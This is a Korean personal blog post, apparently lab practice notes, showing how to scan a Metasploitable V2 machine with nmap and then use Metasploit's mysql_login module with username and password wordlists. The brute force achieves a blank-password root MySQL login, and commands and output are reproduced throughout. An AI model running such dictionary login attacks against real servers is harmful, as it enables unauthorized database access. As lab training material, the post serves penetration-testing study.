| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | 7 |
| 8 | 9 | 10 | 11 | 12 | 13 | 14 |
| 15 | 16 | 17 | 18 | 19 | 20 | 21 |
| 22 | 23 | 24 | 25 | 26 | 27 | 28 |
| 29 | 30 | 31 |
- code injection
- ctf
- metasploit
- 취약점
- MBSA
- Canary
- msfconsole
- file upload
- shellshock
- DNS 정보수집
- File Upload-ZIP
- openvas
- bash shell bug
- Lampiao
- Nexpose
- SQL Injection
- exploit-db
- GHDB
- ASCII-Aromor
- 메모리 보호
- root-me
- JSP 우회
- assert()
- 필터링 우회
- 배시쉘 버그
- WHISTL
- MySQL 원격 로그인.
- SecureCheq
- aslr
- 파일 업로드
- Today
- Total
나만의 연습장
사전 파일을 이용한 MySQL 원격 로그인 시도 본문
!!!경고!!!
본 게시물에는 해킹 기법에 관련한 정보가 포함되어 있습니다.
이를 사용하여 악용할 시에는 법적 문제가 발생할 수 있으며
공격으로 인한 사고에 대해서 작성자는 절대 책임지지 않습니다.
이 페이지를 열함하였다는 것은 이에 동의한 것으로 간주합니다.
■ 실습 개요
- metasploit을 사용하여 취약점을 스캔 해 보자
- 사전 파일을 이용하여 MySQL 원격 로그인 시도한다.
- KaliLinux
- MetasploittableV2 Linux
1. 공격 대상 서버 (EX: 192.168.10.134)의 서비스 목록 확인
# nmap -sV 192.168.10.134 /* Metasploitable V2 Sever IP : 192.168.10.13use4 */
root@kali:~# nmap -sV 192.168.10.134 Starting Nmap 7.70 ( https://nmap.org ) at 2018-11-04 23:12 KST Nmap scan report for 192.168.10.134 Host is up (0.0024s latency). Not shown: 977 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 2.3.4 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0) 23/tcp open telnet Linux telnetd 25/tcp open smtp Postfix smtpd 53/tcp open domain ISC BIND 9.4.2 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) 111/tcp open rpcbind 2 (RPC #100000) 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 512/tcp open exec netkit-rsh rexecd 513/tcp open login OpenBSD or Solaris rlogind 514/tcp open tcpwrapped 1099/tcp open rmiregistry GNU Classpath grmiregistry 1524/tcp open bindshell Metasploitable root shell 2049/tcp open nfs 2-4 (RPC #100003) 2121/tcp open ftp ProFTPD 1.3.1 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5 5432/tcp open postgresql PostgreSQL DB 8.3.0 - 8.3.7 5900/tcp open vnc VNC (protocol 3.3) 6000/tcp open X11 (access denied) 6667/tcp open irc UnrealIRCd 8009/tcp open ajp13 Apache Jserv (Protocol v1.3) 8180/tcp open http Apache Tomcat/Coyote JSP engine 1.1 MAC Address: 00:0C:29:97:EB:EF (VMware) Service Info: Hosts: metasploitable.localdomain, localhost, irc.Metasploitable.LAN; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.73 seconds |
2. msfconsole의 mysql_login auxiliary을 사용하여 MySQL 로그인 시도
# msfconsole
msf > search mysql_login Matching Modules ================ Name Disclosure Date Rank Check Description ---- --------------- ---- ----- ----------- auxiliary/scanner/mysql/mysql_login normal Yes MySQL Login Utility msf > use auxiliary/scanner/mysql/mysql_login msf auxiliary(scanner/mysql/mysql_login) > show options Module options (auxiliary/scanner/mysql/mysql_login): Name Current Setting Required Description ---- --------------- -------- ----------- BLANK_PASSWORDS false no Try blank passwords for all users BRUTEFORCE_SPEED 5 yes How fast to bruteforce, from 0 to 5 DB_ALL_CREDS false no Try each user/password couple stored in the DB_ALL_PASS false no Add all passwords in the current database to the list DB_ALL_USERS false no Add all users in the current database to the list PASSWORD no A specific password to authenticate with PASS_FILE no File containing passwords, one per line Proxies no A proxy chain of format type:host:port [,type:host:port][...] RHOSTS yes The target address range or CIDR identifier RPORT 3306 yes The target port (TCP) STOP_ON_SUCCESS false yes Stop guessing when a credential works for a host THREADS 1 yes The number of concurrent threads USERNAME no A specific username to authenticate as USERPASS_FILE no File containing users and passwords separated by space, one pair per line USER_AS_PASS false no Try the username as the password for all users USER_FILE no File containing usernames, one per line VERBOSE true yes Whether to print output for all attempts msf auxiliary(scanner/mysql/mysql_login) > set RHOSTS 192.168.10.134 RHOSTS => 192.168.10.134 msf auxiliary(scanner/mysql/mysql_login) > run [+] 192.168.10.134:3306 - 192.168.10.134:3306 - Found remote MySQL version 5.0.51a [*] Error: 192.168.10.134: Metasploit::Framework::LoginScanner::Invalid Cred details can't be blank, Cred details can't be blank (Metasploit::Framework::LoginScanner::MySQL) [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed [TERM2] 다른 윈도우에서 user.txt, pass.txt 파일을 생성 # cd /usr/share/metasploit-framework/data/wordlists # vi user.txt root admin administrator # echo "" > pass.txt # -> Metaspolitable V2에서는 root 사용자의 암호가 없다. msf auxiliary(scanner/mysql/mysql_login) > set USER_FILE /usr/share/metasploit-framework/data/wordlists/user.txt USER_FILE => /usr/share/metasploit-framework/data/wordlists/user.txt msf auxiliary(scanner/mysql/mysql_login) > set PASS_FILE /usr/share/metasploit-framework/data/wordlists/pass.txt PASS_FILE => /usr/share/metasploit-framework/data/wordlists/pass.txt msf auxiliary(scanner/mysql/mysql_login) > run [+] 192.168.10.134:3306 - 192.168.10.134:3306 - Found remote MySQL version 5.0.51a [-] 192.168.10.134:3306 - 192.168.10.134:3306 - LOGIN FAILED: admin: (Incorrect: Access denied for user 'admin'@'192.168.10.50' (using password: NO)) [-] 192.168.10.134:3306 - 192.168.10.134:3306 - LOGIN FAILED: administrator: (Incorrect: Access denied for user 'administrator'@'192.168.10.50' (using password: NO)) [+] 192.168.10.134:3306 - 192.168.10.134:3306 - Success: 'root:' [*] Scanned 1 of 1 hosts (100% complete) [*] Auxiliary module execution completed msf auxiliary(scanner/mysql/mysql_login) > quit |
'Metasploit' 카테고리의 다른 글
| MSF DB 생성 및 설정 초기화 (0) | 2018.11.04 |
|---|---|
| 메타스플로잇 개요 (Metasploit Framework) (0) | 2018.11.04 |